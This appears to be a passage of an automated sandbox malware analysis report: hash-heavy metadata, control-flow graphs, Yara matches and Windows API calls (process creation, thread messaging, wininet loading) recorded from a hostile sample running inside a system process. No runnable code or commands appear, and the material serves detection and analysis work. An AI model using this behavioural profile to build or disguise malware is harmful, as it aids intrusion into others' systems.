                                                                                                                      • Snapshot File: hcaresult_12_2_3170000_sfc.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: 5f20f7f66068058212d28965c4f120e24425ba9f558ead962485b0f02275fc78
                                                                                                                      • Instruction ID: a777ce064b45142472837a2db46b5754122a244c20c477c411642e1ec7213016
                                                                                                                      • Opcode Fuzzy Hash: 5f20f7f66068058212d28965c4f120e24425ba9f558ead962485b0f02275fc78
                                                                                                                      • Instruction Fuzzy Hash: 9D900261601904474540B15849044066005D7E6301395D215A1555560C8728C9659269
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4092885357.0000000003170000.00000040.00001000.00020000.00000000.sdmp, Offset: 03170000, based on PE: true
                                                                                                                      • Associated: 0000000C.00000002.4092885357.0000000003299000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000C.00000002.4092885357.000000000329D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000C.00000002.4092885357.000000000330E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_3170000_sfc.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: 8012665fc3a1b6eb8c55be546c3764703992deb872b05d405ccef84e914ac571
                                                                                                                      • Instruction ID: b8bdf9151c6281e38b5a87f97b3d6bb8ec7c55275db44a2c8125f1af5dc59d6d
                                                                                                                      • Opcode Fuzzy Hash: 8012665fc3a1b6eb8c55be546c3764703992deb872b05d405ccef84e914ac571
                                                                                                                      • Instruction Fuzzy Hash: A190023160590807D500B15846147061005C7D5201F65D511A1425568D87A5CA6165A2
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4092885357.0000000003170000.00000040.00001000.00020000.00000000.sdmp, Offset: 03170000, based on PE: true
                                                                                                                      • Associated: 0000000C.00000002.4092885357.0000000003299000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000C.00000002.4092885357.000000000329D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000C.00000002.4092885357.000000000330E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_3170000_sfc.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: 8e87e72f605c33a43f17ca32e9bf939780f1e69c9e7cf41a43ae172e4b0a1baa
                                                                                                                      • Instruction ID: 779b6f08b572a1caff6f351ef451c83961350faafb65132d57283b41de62b499
                                                                                                                      • Opcode Fuzzy Hash: 8e87e72f605c33a43f17ca32e9bf939780f1e69c9e7cf41a43ae172e4b0a1baa
                                                                                                                      • Instruction Fuzzy Hash: 9B900261202804074505B1584514616400AC7E5201B55D121E2015590DC735C9A16125
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4092885357.0000000003170000.00000040.00001000.00020000.00000000.sdmp, Offset: 03170000, based on PE: true
                                                                                                                      • Associated: 0000000C.00000002.4092885357.0000000003299000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000C.00000002.4092885357.000000000329D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000C.00000002.4092885357.000000000330E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_3170000_sfc.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: 29a40f4eeb5f596e77bb712c074e1c838529a11d3703de7fc258cda251b3784f
                                                                                                                      • Instruction ID: 93c3588a8241d536fdf99873c2348d5cda7f4a2f0b679a89475ca26ce774e3ae
                                                                                                                      • Opcode Fuzzy Hash: 29a40f4eeb5f596e77bb712c074e1c838529a11d3703de7fc258cda251b3784f
                                                                                                                      • Instruction Fuzzy Hash: 1E90023160580C07D550B15845147460005C7D5301F55D111A1025654D8765CB6576A1
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4092885357.0000000003170000.00000040.00001000.00020000.00000000.sdmp, Offset: 03170000, based on PE: true
                                                                                                                      • Associated: 0000000C.00000002.4092885357.0000000003299000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000C.00000002.4092885357.000000000329D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000C.00000002.4092885357.000000000330E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_3170000_sfc.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: 1cb71f416a950031cba9bcc1be1c0bdffe0ffff3fa70b241cf58ecc996aec398
                                                                                                                      • Instruction ID: a49994fff58547504ab8c5d763ea2437e5d3cd24a341c08a5d47c8b89dde6410
                                                                                                                      • Opcode Fuzzy Hash: 1cb71f416a950031cba9bcc1be1c0bdffe0ffff3fa70b241cf58ecc996aec398
                                                                                                                      • Instruction Fuzzy Hash: C690023120180C07D580B158450464A0005C7D6301F95D115A1026654DCB25CB6977A1
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4092885357.0000000003170000.00000040.00001000.00020000.00000000.sdmp, Offset: 03170000, based on PE: true
                                                                                                                      • Associated: 0000000C.00000002.4092885357.0000000003299000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000C.00000002.4092885357.000000000329D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000C.00000002.4092885357.000000000330E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_3170000_sfc.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: e327a5baa2cb2a5e67938a55668a4008c6287addc3216aaf47891c849b1450b0
                                                                                                                      • Instruction ID: 5fd48ef630eaaab1b322c828e9318af249117879d5fb7d49f3401d0aa8a47fa7
                                                                                                                      • Opcode Fuzzy Hash: e327a5baa2cb2a5e67938a55668a4008c6287addc3216aaf47891c849b1450b0
                                                                                                                      • Instruction Fuzzy Hash: 6F90023120584C47D540B1584504A460015C7D5305F55D111A1065694D9735CE65B661
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4092885357.0000000003170000.00000040.00001000.00020000.00000000.sdmp, Offset: 03170000, based on PE: true
                                                                                                                      • Associated: 0000000C.00000002.4092885357.0000000003299000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000C.00000002.4092885357.000000000329D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000C.00000002.4092885357.000000000330E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_3170000_sfc.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: 6f8835ab32385e5557f940c650edc5f638bf0e58f2cee742a77178a9617c4dd2
                                                                                                                      • Instruction ID: 1bd701080e2105da5e1dab36ae2e30f1c3b93bc6f33014245281d760825de952
                                                                                                                      • Opcode Fuzzy Hash: 6f8835ab32385e5557f940c650edc5f638bf0e58f2cee742a77178a9617c4dd2
                                                                                                                      • Instruction Fuzzy Hash: DB900435311C04070505F55C07045070047C7DF351355D131F3017550CD731CD715131
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4092885357.0000000003170000.00000040.00001000.00020000.00000000.sdmp, Offset: 03170000, based on PE: true
                                                                                                                      • Associated: 0000000C.00000002.4092885357.0000000003299000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000C.00000002.4092885357.000000000329D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000C.00000002.4092885357.000000000330E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_3170000_sfc.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4092885357.0000000003170000.00000040.00001000.00020000.00000000.sdmp, Offset: 03170000, based on PE: true
                                                                                                                      • Associated: 0000000C.00000002.4092885357.0000000003299000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000C.00000002.4092885357.000000000329D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000C.00000002.4092885357.000000000330E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_3170000_sfc.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: 378c557030217c02018dcc5ac64ebf19adf00f9f9776a79d10f2fd10554279c3
                                                                                                                      • Instruction ID: 01d687d8909786fb816286d179567f7d86475669e4fa65f590dc21b9cc9f839f
                                                                                                                      • Opcode Fuzzy Hash: 378c557030217c02018dcc5ac64ebf19adf00f9f9776a79d10f2fd10554279c3
                                                                                                                      • Instruction Fuzzy Hash: BF90023120180C47D500B1584504B460005C7E5301F55D116A1125654D8725C9617521
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4092885357.0000000003170000.00000040.00001000.00020000.00000000.sdmp, Offset: 03170000, based on PE: true
                                                                                                                      • Associated: 0000000C.00000002.4092885357.0000000003299000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000C.00000002.4092885357.000000000329D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000C.00000002.4092885357.000000000330E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_3170000_sfc.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: d93f9420aead6bb3db31aac5312c2caa84b82ee3565b469a8e4d6842051cc9af
                                                                                                                      • Instruction ID: d960bbe6798b84467706ecbd168e4fe432df55021cf3d7614a2792053924088a
                                                                                                                      • Opcode Fuzzy Hash: d93f9420aead6bb3db31aac5312c2caa84b82ee3565b469a8e4d6842051cc9af
                                                                                                                      • Instruction Fuzzy Hash: CF90023120180807D500B59855086460005C7E5301F55E111A6025555EC775C9A16131

                                                                                                                      Control-flow Graph

                                                                                                                      control_flow_graph 526 2aa238f-2aa239c 527 2aa239e-2aa23b3 526->527 528 2aa2376 526->528 529 2aa23db-2aa23ed 527->529 530 2aa23b5-2aa23bd 527->530 533 2aa23ef 529->533 531 2aa23c0-2aa23c3 530->531 532 2aa2407-2aa241b 530->532 536 2aa2353-2aa2361 531->536 537 2aa23c5 531->537 534 2aa241d-2aa2427 532->534 535 2aa23c6-2aa23da 532->535 533->532 538 2aa2429-2aa2440 534->538 539 2aa24a0-2aa24a2 534->539 535->529 540 2aa2363-2aa2375 536->540 541 2aa23e1-2aa23ed 536->541 537->535 549 2aa245a 538->549 550 2aa2442-2aa244d 538->550 542 2aa24ff-2aa2502 539->542 543 2aa24a4-2aa24ab 539->543 540->528 541->533 546 2aa254d-2aa2553 542->546 545 2aa24ad-2aa24c2 543->545 551 2aa2520-2aa2547 545->551 552 2aa24c4 545->552 547 2aa2583-2aa25da call 2a93e10 call 2a81410 call 2aa0c30 546->547 548 2aa2555-2aa2568 call 2aa9730 546->548 567 2aa25e0-2aa25f4 Sleep 547->567 559 2aa256e-2aa257f call 2aa9810 548->559 560 2aa266c-2aa2672 548->560 549->545 555 2aa245c-2aa2463 549->555 550->549 551->546 552->542 555->539 559->547 568 2aa2659-2aa2660 567->568 569 2aa25f6-2aa25fc 567->569 568->567 572 2aa2666 568->572 570 2aa25fe-2aa2624 call 2aa4850 569->570 571 2aa2626-2aa2646 569->571 574 2aa264c-2aa264f 570->574 571->574 575 2aa2647 call 2aa48f0 571->575 572->560 574->568 575->574
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4091718758.0000000002A80000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A80000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_2a80000_sfc.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: O?L/$net.dll$wininet.dll
                                                                                                                      • API String ID: 0-576308649
                                                                                                                      • Opcode ID: a8a5ff7d997ff086e41e6cdbee0f0eadb63e79087a04fe0a6fb27f23cfaa67c4
                                                                                                                      • Instruction ID: f4cef5870f8988a5aa7f66d1c5423698eb069185c1b0aceaf1e0190250d31c44
                                                                                                                      • Opcode Fuzzy Hash: a8a5ff7d997ff086e41e6cdbee0f0eadb63e79087a04fe0a6fb27f23cfaa67c4
                                                                                                                      • Instruction Fuzzy Hash: 005196B1A41701ABCB15CF34CCA1BE6BBA9FF45314F24469DEC588B281EB70A561CB91

                                                                                                                      Control-flow Graph

                                                                                                                      control_flow_graph 577 2a9041f-2a90425 578 2a9045f-2a904ca call 2aa9860 call 2aaa270 call 2a93e10 call 2a81410 call 2aa0c30 577->578 579 2a90427-2a9042d 577->579 590 2a904ea-2a904f0 578->590 591 2a904cc-2a904db PostThreadMessageW 578->591 579->578 591->590 592 2a904dd-2a904e7 591->592 592->590
                                                                                                                      APIs
                                                                                                                      • PostThreadMessageW.USER32(5HG1921,00000111,00000000,00000000), ref: 02A904D7
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4091718758.0000000002A80000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A80000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_2a80000_sfc.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: MessagePostThread
                                                                                                                      • String ID: 5HG1921$5HG1921
                                                                                                                      • API String ID: 1836367815-1110840446
                                                                                                                      • Opcode ID: 6cb5c63604678ed013be2d7a969ddfc50513a42e798849a4c834d16f530c0797
                                                                                                                      • Instruction ID: 591717ee9cbd705ce2f7c031d162fa98efa90931c80f2a81de11c656afd988c0
                                                                                                                      • Opcode Fuzzy Hash: 6cb5c63604678ed013be2d7a969ddfc50513a42e798849a4c834d16f530c0797
                                                                                                                      • Instruction Fuzzy Hash: 8111A3B294025CBEEF12ABD19C90DEF7BBDEF81394F058064F614AB100DA345E16CBA1

                                                                                                                      Control-flow Graph

                                                                                                                      control_flow_graph 593 2a90459-2a90472 594 2a9047a-2a904ca call 2aaa270 call 2a93e10 call 2a81410 call 2aa0c30 593->594 595 2a90475 call 2aa9860 593->595 604 2a904ea-2a904f0 594->604 605 2a904cc-2a904db PostThreadMessageW 594->605 595->594 605->604 606 2a904dd-2a904e7 605->606 606->604
                                                                                                                      APIs
                                                                                                                      • PostThreadMessageW.USER32(5HG1921,00000111,00000000,00000000), ref: 02A904D7
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4091718758.0000000002A80000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A80000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_2a80000_sfc.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: MessagePostThread
                                                                                                                      • String ID: 5HG1921$5HG1921
                                                                                                                      • API String ID: 1836367815-1110840446
                                                                                                                      • Opcode ID: f1318d8b1bff014d8375fd1b232d232ce3a1418c210069b2df722e664ea9f267
                                                                                                                      • Instruction ID: fa01698a4280541928fc63b03b5053ba682420e988a871ef7cf7fea6060916a6
                                                                                                                      • Opcode Fuzzy Hash: f1318d8b1bff014d8375fd1b232d232ce3a1418c210069b2df722e664ea9f267
                                                                                                                      • Instruction Fuzzy Hash: B501A1B2D4010CBAEF11ABE18C91DEFBBBDEF45394F058164FA04AB141DA355E168BA1

                                                                                                                      Control-flow Graph

                                                                                                                      control_flow_graph 607 2a90460-2a90472 608 2a9047a-2a904ca call 2aaa270 call 2a93e10 call 2a81410 call 2aa0c30 607->608 609 2a90475 call 2aa9860 607->609 618 2a904ea-2a904f0 608->618 619 2a904cc-2a904db PostThreadMessageW 608->619 609->608 619->618 620 2a904dd-2a904e7 619->620 620->618
                                                                                                                      APIs
                                                                                                                      • PostThreadMessageW.USER32(5HG1921,00000111,00000000,00000000), ref: 02A904D7
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4091718758.0000000002A80000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A80000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_2a80000_sfc.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: MessagePostThread
                                                                                                                      • String ID: 5HG1921$5HG1921
                                                                                                                      • API String ID: 1836367815-1110840446
                                                                                                                      • Opcode ID: 7bc25cef7b4fec5ee93a0d6950db229c6397c4dacc09d0faeced583e2eb8bfc3
                                                                                                                      • Instruction ID: de820ba7e9cf9f57d3a5c8fbe9f472a13235b10f3118de4fd7cb7eabcc7f341e
                                                                                                                      • Opcode Fuzzy Hash: 7bc25cef7b4fec5ee93a0d6950db229c6397c4dacc09d0faeced583e2eb8bfc3
                                                                                                                      • Instruction Fuzzy Hash: 400184B2D4021CBAEF11AAE18C91DEFBBBDDF45794F058064FA04A7141DA745E068BA1
                                                                                                                      APIs
                                                                                                                      • Sleep.KERNELBASE(000007D0), ref: 02AA25EB
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4091718758.0000000002A80000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A80000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_2a80000_sfc.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Sleep
                                                                                                                      • String ID: net.dll$wininet.dll
                                                                                                                      • API String ID: 3472027048-1269752229
                                                                                                                      • Opcode ID: 1cf7e09954a324fef1f24bbf1a96cb8dc40ce5fb04ac278efa2c42ca2481e72c
                                                                                                                      • Instruction ID: ed07f75b8acdad21e9b50d6002e407e7d7d8a0e9a6688236479765bec6000f4a
                                                                                                                      • Opcode Fuzzy Hash: 1cf7e09954a324fef1f24bbf1a96cb8dc40ce5fb04ac278efa2c42ca2481e72c
                                                                                                                      • Instruction Fuzzy Hash: 623168B1A41704ABC714DF64CC94FE7BBA9AF88304F10852CE9595B240DB70BA548FA5
                                                                                                                      APIs
                                                                                                                      • Sleep.KERNELBASE(000007D0), ref: 02AA25EB
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4091718758.0000000002A80000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A80000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_2a80000_sfc.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Sleep
                                                                                                                      • String ID: net.dll$wininet.dll
                                                                                                                      • API String ID: 3472027048-1269752229
                                                                                                                      • Opcode ID: d67687cccd87788831caaaed8a25e2b3849b24fdb9166769d272a1f9bb9b2327
                                                                                                                      • Instruction ID: 56d4a045bdd2d7369b8ab4704f516245d5065329618d6e27da7678b9d5212b4b
                                                                                                                      • Opcode Fuzzy Hash: d67687cccd87788831caaaed8a25e2b3849b24fdb9166769d272a1f9bb9b2327
                                                                                                                      • Instruction Fuzzy Hash: 9A3122B1A41B01ABC714AF78C9A4BE6BBB9FF48304F50861DE81D8B240EB71A555CF91
                                                                                                                      APIs
                                                                                                                      • Sleep.KERNELBASE(000007D0), ref: 02AA25EB
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4091718758.0000000002A80000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A80000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_2a80000_sfc.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Sleep
                                                                                                                      • String ID: net.dll$wininet.dll
                                                                                                                      • API String ID: 3472027048-1269752229
                                                                                                                      • Opcode ID: c876b4a344aab78a18243edb4989c1418d112aadd7aa0789f107c38c7dc092af
                                                                                                                      • Instruction ID: 7dce203f00df1efd72482d46fc2d3f84b95462201618635d36f6d53f31514aa3
                                                                                                                      • Opcode Fuzzy Hash: c876b4a344aab78a18243edb4989c1418d112aadd7aa0789f107c38c7dc092af
                                                                                                                      • Instruction Fuzzy Hash: A3319AB1A41705AECB14DF64CC94FEBBBA9EF88304F108528E9196B240EB746954CFA5
                                                                                                                      APIs
                                                                                                                      • CoInitialize.OLE32(00000000), ref: 02A9E5B7
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4091718758.0000000002A80000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A80000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_2a80000_sfc.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Initialize
                                                                                                                      • String ID: @J7<
                                                                                                                      • API String ID: 2538663250-2016760708
                                                                                                                      APIs
                                                                                                                      • CoInitialize.OLE32(00000000), ref: 02A9E5B7
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4091718758.0000000002A80000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A80000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_2a80000_sfc.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Initialize
                                                                                                                      • String ID: @J7<
                                                                                                                      • API String ID: 2538663250-2016760708
                                                                                                                      APIs
                                                                                                                      • FindNextFileW.KERNELBASE(?,00000010), ref: 02A9B91F
                                                                                                                      • FindClose.KERNELBASE(?), ref: 02A9B92A
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4091718758.0000000002A80000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A80000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_2a80000_sfc.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Find$CloseFileNext
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2066263336-0
                                                                                                                      APIs
                                                                                                                      • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 02A93E82
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4091718758.0000000002A80000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A80000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_2a80000_sfc.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Load
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2234796835-0
                                                                                                                      APIs
                                                                                                                      • CreateProcessInternalW.KERNELBASE(?,?,?,?,02A976D3,00000010,?,?,?,00000044,?,00000010,02A976D3,?,?,?), ref: 02AA7D43
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4091718758.0000000002A80000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A80000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_2a80000_sfc.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateInternalProcess
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2186235152-0
                                                                                                                      APIs
                                                                                                                      • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02A892F5
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4091718758.0000000002A80000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A80000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_2a80000_sfc.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateThread
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2422867632-0
                                                                                                                      APIs
                                                                                                                      • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 02A93E82
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4091718758.0000000002A80000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A80000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_2a80000_sfc.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Load
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2234796835-0
                                                                                                                      APIs
                                                                                                                      • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02A892F5
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4091718758.0000000002A80000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A80000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_2a80000_sfc.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateThread
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2422867632-0
                                                                                                                      APIs
                                                                                                                      • RtlAllocateHeap.NTDLL(02A91079,?,02AA46DF,02A91079,02AA4037,02AA46DF,?,02A91079,02AA4037,00001000,?,?,02AA94B0), ref: 02AA7C59
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4091718758.0000000002A80000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A80000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_2a80000_sfc.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: AllocateHeap
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1279760036-0
                                                                                                                      APIs
                                                                                                                      • RtlFreeHeap.NTDLL(00000000,00000004,00000000,5057E845,00000007,00000000,00000004,00000000,02A936F3,000000F4,?,?,?,?,?), ref: 02AA7C99
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4091718758.0000000002A80000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A80000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_2a80000_sfc.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: FreeHeap
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3298025750-0
                                                                                                                      APIs
                                                                                                                      • GetFileAttributesW.KERNELBASE(?,?,?,?,000004D8,00000000), ref: 02A9773C
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4091718758.0000000002A80000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A80000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_2a80000_sfc.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: AttributesFile
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3188754299-0
                                                                                                                      APIs
                                                                                                                      • SetErrorMode.KERNELBASE(00008003,?,?,02A91350,02AA6757,02AA4037,?), ref: 02A97553
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4091718758.0000000002A80000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A80000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_2a80000_sfc.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
